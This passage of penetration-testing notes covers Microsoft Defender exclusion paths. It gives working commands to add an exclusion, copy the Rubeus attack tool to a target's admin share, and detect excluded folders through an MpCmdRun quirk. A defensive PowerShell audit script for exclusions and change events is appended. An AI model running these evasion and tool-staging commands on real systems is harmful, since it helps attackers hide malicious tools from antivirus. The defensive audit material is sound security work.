Enable ExclusionPath on Defender (Requires local Administrator)

An exclusion path can be defined in Defender, which turns that path into a location on the target machine where files can be uploaded without being scanned:

Get-MpPreference | select ExclusionPath
Set-MpPreference -ExclusionPath "C:\Users\Public"

Now map the drive, copy the tools, and unmap the drive:

net use x: \\<target>\c$
echo F | xcopy.exe C:\Tools\Rubeus.exe x:\Users\Public\
net use x: /D

Uncover ExclusionPath (no local Administrator required💦)

& "C:\Program Files\Windows Defender\MpCmdRun.exe" -Scan -ScanType 3 -File "C:\folder_to_check\|*"

If the folder is excluded, the output will read “Scanning C:\folder_to_check\|* was skipped.”

Successful enumeration of an excluded folder

If the folder is not excluded, the system will return an error message stating “CmdTool: Failed with hr = 0x80508023. Check C:\Users\ADMINI~1\AppData\Local\Temp\MpCmdRun.log for more information” because of the invalid path created by the use of the “|*” syntax.

Scanning a folder that is not excluded yields an error

This method works because Microsoft Defender consults the exclusion list before it scans any file in the folder (a design that benefits tools which run repeatedly from a fixed location and should not be rescanned every time).

Because “|*” is not a valid file or folder name, the “|” approach makes Defender perform only the exclusion check for the directory: it first verifies whether the directory is on the exclusion list, and no file scan ever takes place, even when the folder is not excluded.

https://blog.fndsec.net/2024/10/04/uncovering-exclusion-paths-in-microsoft-defender-a-security-research-insight/
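From the defensive side, the same exclusion list is worth auditing regularly. The following is an added example, not part of these notes or the linked research: run from an elevated PowerShell session, it lists Defender's path, extension and process exclusions, flags path exclusions that sit in locations a standard user can write to (the foothold described above), and pulls recent Defender configuration-change events (ID 5007) that touched exclusions. The list of risky roots is my own heuristic, not a Microsoft list.

```powershell
# Added example (not from the original notes): audit Defender exclusions and
# surface who changed them. Requires local Administrator, like Set-MpPreference.
# Assumption: $riskyRoots is a hand-picked heuristic of user-writable locations.

$riskyRoots = @(
    "$env:SystemDrive\Users",        # covers Public and every per-user profile
    "$env:SystemDrive\ProgramData",
    "$env:SystemDrive\Temp",
    "$env:windir\Temp"
)

function Test-RiskyExclusion {
    param([Parameter(Mandatory)][string]$Path)
    # Wildcards and bare drive roots exclude far more than a single folder.
    if ($Path -match '[\*\?]' -or $Path -match '^[A-Za-z]:\\?$') { return $true }
    $p = $Path.TrimEnd('\')
    foreach ($root in $riskyRoots) {
        if ($p -like "$($root.TrimEnd('\'))*") { return $true }
    }
    return $false
}

$pref     = Get-MpPreference
$findings = [System.Collections.Generic.List[object]]::new()
foreach ($p in @($pref.ExclusionPath)) {
    if ($p) { $findings.Add([pscustomobject]@{ Type='Path'; Value=$p; Risky=(Test-RiskyExclusion $p) }) }
}
# Extension and process exclusions bypass scanning just as effectively; always review them.
foreach ($e in @($pref.ExclusionExtension)) {
    if ($e) { $findings.Add([pscustomobject]@{ Type='Extension'; Value=$e; Risky=$true }) }
}
foreach ($x in @($pref.ExclusionProcess)) {
    if ($x) { $findings.Add([pscustomobject]@{ Type='Process'; Value=$x; Risky=$true }) }
}
$findings | Sort-Object Risky -Descending | Format-Table -AutoSize

# Who changed it and when? Event 5007 in the Defender operational log records each
# configuration change; exclusion edits appear as registry values under
# ...\Windows Defender\Exclusions\ in the "New value" line of the message.
Get-WinEvent -FilterHashtable @{
        LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5007
    } -MaxEvents 200 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'Exclusions' } |
    ForEach-Object {
        $new = ($_.Message -split "`r?`n" | Where-Object { $_ -match 'New value' }) -join ' '
        [pscustomobject]@{ Time = $_.TimeCreated; Change = $new.Trim() }
    } | Format-Table -Wrap
```

Forwarding the 5007 events to a SIEM and alerting on any new entry under Exclusions\Paths gives the same coverage continuously rather than on demand.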

Disable Windows Defender (Requires local Administrator)